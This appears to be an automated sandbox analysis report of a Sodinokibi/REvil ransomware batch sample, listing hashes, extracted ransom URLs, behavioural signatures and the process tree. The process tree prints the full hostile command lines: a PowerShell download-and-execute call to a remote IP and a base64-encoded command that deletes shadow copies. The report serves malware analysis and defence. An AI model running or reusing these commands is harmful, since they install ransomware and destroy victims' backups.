Analysis
-
max time kernel
35s -
max time network
53s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
21-05-2020 17:10
Static task
static1
Behavioral task
behavioral1
Sample
9e366799514a8ce5bccab4fc1af01e1f.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
9e366799514a8ce5bccab4fc1af01e1f.bat
Resource
win10v200430
General
-
Target
9e366799514a8ce5bccab4fc1af01e1f.bat
-
Size
213B
-
MD5
7563bdc5ef2e60e4af282d344dbde9ff
-
SHA1
87ec59517e50fe716e21c255f572e11e0b810619
-
SHA256
a15036f075ca149cc6635c5eb2cb1bab41c2462e3ad0d2b36513aa29099d1424
-
SHA512
178d9cca7b3a22c9fa0c5eaa052397bf36c815d64999ed5dc05d4e5922fcd28e7807a3ba8e3811e472838ec7de9746aa5cbd778ae48268e6af92a78f347c3f5f
Malware Config
Extracted
http://185.103.242.78/pastes/9e366799514a8ce5bccab4fc1af01e1f
Extracted
C:\j1x6ccx522-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/736B31DC4CA46E7E
http://decryptor.cc/736B31DC4CA46E7E
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1424 powershell.exe Token: SeDebugPrivilege 1424 powershell.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeBackupPrivilege 528 vssvc.exe Token: SeRestorePrivilege 528 vssvc.exe Token: SeAuditPrivilege 528 vssvc.exe Token: SeTakeOwnershipPrivilege 1424 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 1424 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 32 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\GetStep.mhtml powershell.exe File created \??\c:\program files\microsoft sql server compact edition\j1x6ccx522-readme.txt powershell.exe File opened for modification \??\c:\program files\RedoDisconnect.m4v powershell.exe File created \??\c:\program files (x86)\j1x6ccx522-readme.txt powershell.exe File opened for modification \??\c:\program files\HideUnblock.pcx powershell.exe File opened for modification \??\c:\program files\LimitOptimize.ogg powershell.exe File opened for modification \??\c:\program files\SendTrace.M2V powershell.exe File opened for modification \??\c:\program files\UnpublishSuspend.easmx powershell.exe File opened for modification \??\c:\program files\OpenSave.png powershell.exe File opened for modification \??\c:\program files\TraceMeasure.search-ms powershell.exe File opened for modification \??\c:\program files\DenyReset.dwg powershell.exe File opened for modification \??\c:\program files\DismountExit.jpeg powershell.exe File opened for modification \??\c:\program files\GetRemove.txt powershell.exe File opened for modification \??\c:\program files\NewUse.ttc powershell.exe File opened for modification \??\c:\program files\TestReset.mpe powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\j1x6ccx522-readme.txt powershell.exe File created \??\c:\program files\j1x6ccx522-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertFromPublish.dib powershell.exe File opened for modification \??\c:\program files\ProtectMeasure.ogg powershell.exe File opened for modification \??\c:\program files\ResetNew.mp4v powershell.exe File opened for modification \??\c:\program files\TestRead.vssx powershell.exe File opened for modification \??\c:\program files\ExpandRemove.mhtml powershell.exe File opened for modification \??\c:\program files\InstallFormat.3gp2 powershell.exe File opened for modification \??\c:\program files\LimitHide.htm powershell.exe File opened for modification \??\c:\program files\MergeSelect.ogg powershell.exe File opened for modification \??\c:\program files\RevokeRead.DVR-MS powershell.exe File opened for modification \??\c:\program files\SaveConvert.i64 powershell.exe File opened for modification \??\c:\program files\SwitchDisconnect.scf powershell.exe File opened for modification \??\c:\program files\OpenEnter.mp4 powershell.exe File opened for modification \??\c:\program files\RemoveDisable.mpeg2 powershell.exe File opened for modification \??\c:\program files\SavePing.vstx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\j1x6ccx522-readme.txt powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1424 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1008 wrote to memory of 1424 1008 cmd.exe powershell.exe PID 1424 wrote to memory of 1540 1424 powershell.exe powershell.exe PID 1424 wrote to memory of 1540 1424 powershell.exe powershell.exe PID 1424 wrote to memory of 1540 1424 powershell.exe powershell.exe PID 1424 wrote to memory of 1540 1424 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1540 powershell.exe 1540 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d20cojtlm5.bmp" powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\9e366799514a8ce5bccab4fc1af01e1f.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/9e366799514a8ce5bccab4fc1af01e1f');Invoke-CRSRXA;Start-Sleep -s 10000"2⤵
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Sets desktop wallpaper using registry
PID:1424 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1540
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:528